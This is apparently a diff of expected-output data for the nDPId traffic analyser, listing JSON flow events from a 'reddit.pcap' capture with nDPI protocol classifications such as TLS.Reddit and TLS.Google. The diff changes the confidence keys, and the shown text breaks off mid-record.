-00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1605291690926,"flow_last_seen":1605291691119,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":6361,"flow_avg_l4_payload_len":181,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} -00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":73,"flow_first_seen":1605291686985,"flow_last_seen":1605291690314,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2776,"flow_tot_l4_payload_len":41240,"flow_avg_l4_payload_len":564,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605291688712,"flow_last_seen":1605291688927,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":5005,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":636,"flow_first_seen":1605291687931,"flow_last_seen":1605291698785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7248,"flow_tot_l4_payload_len":748553,"flow_avg_l4_payload_len":1176,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"}} -00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605291687896,"flow_last_seen":1605291688326,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6703,"flow_avg_l4_payload_len":216,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1605291690926,"flow_last_seen":1605291691154,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":10872,"flow_tot_l4_payload_len":111125,"flow_avg_l4_payload_len":1068,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1605291690926,"flow_last_seen":1605291691043,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8556,"flow_avg_l4_payload_len":305,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1605291690926,"flow_last_seen":1605291691043,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8555,"flow_avg_l4_payload_len":305,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291690926,"flow_last_seen":1605291691043,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8556,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291690926,"flow_last_seen":1605291691044,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8557,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":164,"flow_first_seen":1605291686985,"flow_last_seen":1605291698522,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2333,"flow_tot_l4_payload_len":45370,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} -00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605291690373,"flow_last_seen":1605291690520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":5684,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291687934,"flow_last_seen":1605291688340,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6623,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"}} +00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":847,"flow_first_seen":1605291684452,"flow_last_seen":1605291698703,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6245,"flow_tot_l4_payload_len":482020,"flow_avg_l4_payload_len":569,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":114,"flow_first_seen":1605291688843,"flow_last_seen":1605291691232,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2416,"flow_tot_l4_payload_len":69230,"flow_avg_l4_payload_len":607,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291684481,"flow_last_seen":1605291684654,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4527,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291688843,"flow_last_seen":1605291689005,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3846,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605291686035,"flow_last_seen":1605291686148,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1442,"flow_first_seen":1605291686035,"flow_last_seen":1605291696381,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11528,"flow_tot_l4_payload_len":1922359,"flow_avg_l4_payload_len":1333,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291686035,"flow_last_seen":1605291686148,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1605291686035,"flow_last_seen":1605291686148,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291686035,"flow_last_seen":1605291686149,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1605291686035,"flow_last_seen":1605291686156,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686060,"flow_last_seen":1605291686196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686060,"flow_last_seen":1605291686196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":133,"flow_first_seen":1605291686060,"flow_last_seen":1605291697854,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":10480,"flow_tot_l4_payload_len":99015,"flow_avg_l4_payload_len":744,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291686060,"flow_last_seen":1605291686196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4191,"flow_avg_l4_payload_len":246,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":5480,"flow_first_seen":1605291686064,"flow_last_seen":1605291695840,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9432,"flow_tot_l4_payload_len":5723539,"flow_avg_l4_payload_len":1044,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686064,"flow_last_seen":1605291686203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4547,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605291686064,"flow_last_seen":1605291686203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4165,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605291686064,"flow_last_seen":1605291686203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4165,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686084,"flow_last_seen":1605291686232,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1605291686084,"flow_last_seen":1605291686283,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":9920,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1605291690421,"flow_last_seen":1605291690571,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8079,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":112,"flow_first_seen":1605291686301,"flow_last_seen":1605291696305,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":40926,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1605291689408,"flow_last_seen":1605291689979,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":8337,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291688344,"flow_last_seen":1605291688502,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":7212,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":118,"flow_first_seen":1605291686996,"flow_last_seen":1605291688354,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5552,"flow_tot_l4_payload_len":94136,"flow_avg_l4_payload_len":797,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 